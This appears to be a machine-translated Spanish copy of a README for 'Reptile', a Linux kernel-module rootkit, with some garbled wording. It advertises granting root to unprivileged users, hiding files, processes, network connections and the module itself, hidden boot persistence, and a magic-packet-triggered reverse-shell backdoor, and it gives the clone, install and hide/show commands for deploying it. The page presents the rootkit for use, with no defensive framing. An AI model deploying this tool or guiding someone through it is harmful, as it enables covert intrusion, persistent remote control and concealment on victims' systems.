Reptil Rootkit para Linux

Reptil

Rootkit de Linux LKM

Probado en

Debian 9 : 4.9.0-8-amd64
Debian 10 : 4.19.0-8-amd64
Ubuntu 18.04.1 LTS : 4.15.0-38-genérico
Kali Linux : 4.18.0-kali2-amd64
Centos 6.10 : 2.6.32- 754.6.3.el6.x86_64
Centos 7 : 3.10.0-862.3.2.el7.x86_64
Centos 8 : 4.18.0-147.5.1.el8_1.x86_64

Caracteristicas

• Dar root a usuarios sin privilegios
• Ocultar archivos y directorios
• Ocultar procesos
• Esconderse
• Ocultar conexiones TCP / IP
• Persistencia de arranque oculta
• Manipulación del contenido del archivo
• Algunas técnicas de ofuscación
• Puerta trasera ICMP / UDP / TCP
• Completo TTY / PTY shell con transferencia de archivos
• Cliente para manejar Reptile Shell
• Shell se conecta cada X veces (no predeterminado)

Registro de cambios v2.0

• configurando script de inicio y arreglando
• Arreglando el cifrado del remitente del paquete
• líneas sin comentarios con persistencia
• Definiendo PWD

Instalar en pc

apt-get install linux-headers - $ (uname -r)
perl -MCPAN -e "install String :: Unescape"
git clone https://github.com/f0rb1dd3n/Reptile.git
cd Reptile
./setup.sh install 

Dar root a usuarios sin privilegios

Para obtener privilegios de root simplemente escriba:  / reptile / reptile_cmd  

archivos, directorios y módulo de kernel

Todos los archivos y carpetas que tengan  reptiles  en el nombre estarán ocultos. Puede configurar esto en el script de instalación. Los siguientes comandos ocultan / muestran archivos, carpetas, procesos y módulos del núcleo.

Para ocultar:  / reptile / reptile_cmd hide 
Para mostrar:  / reptile / reptile_cmd show

Ocultar procesos

Para ocultar procesos:  / reptile / reptile_cmd hide <pid> 
Para mostrar procesos:  / reptile / reptile_cmd show <pid>

Ocultar conexiones TCP / IP

Ocultar:  / reptile / reptile_cmd conn <IP> <port> hide Ocultar 
:  / reptile / reptile_cmd conn <IP> <port> show

Manipulación del contenido del archivo

Todo el contenido entre etiquetas estará oculto:

# <reptil> 
contenido para ocultar 
# </reptile>

Puede configurar estas etiquetas en el script de instalación.

Puerta trasera

La puerta trasera es un shell inverso activado por un paquete mágico enviado a través del protocolo TCP, UDP o ICMP.

Cliente

Compilación:

./setup client

El cliente es similar a MSF y su uso es muy fácil. Ejecute  ./client  y simplemente escriba  help  para ver los comandos.

Hay otros dos binarios:  oyente  y  paquete . El  binario del cliente  manejará el  oyente y el  paquete,  pero puede usarlos por separado si desea:

Cáscara

El shell es fácil de usar, solo escriba  help  para ver los comandos.

• Ya oculta su proceso y conexión.
• Su conexión está encriptada
• Hay un cargador de archivos y un descargador de archivos dentro.
• Puede establecer un retraso para recibir una conexión inversa cada vez que lo desee.
• Si ejecuta  shell  obtendrá un shell TTY / PTY completo como ssh.

Puede compilar este shell en una versión independiente para usar sin el Módulo Kernel:

./setup reverse

Tendrá que usar el  oyente  para conectarse con el shell inverso independiente porque no enviará paquetes mágicos. ¡Simplemente compile con  ./setup client  y use el  oyente  binario!

Fuente:  https://github.com/f0rb1dd3n/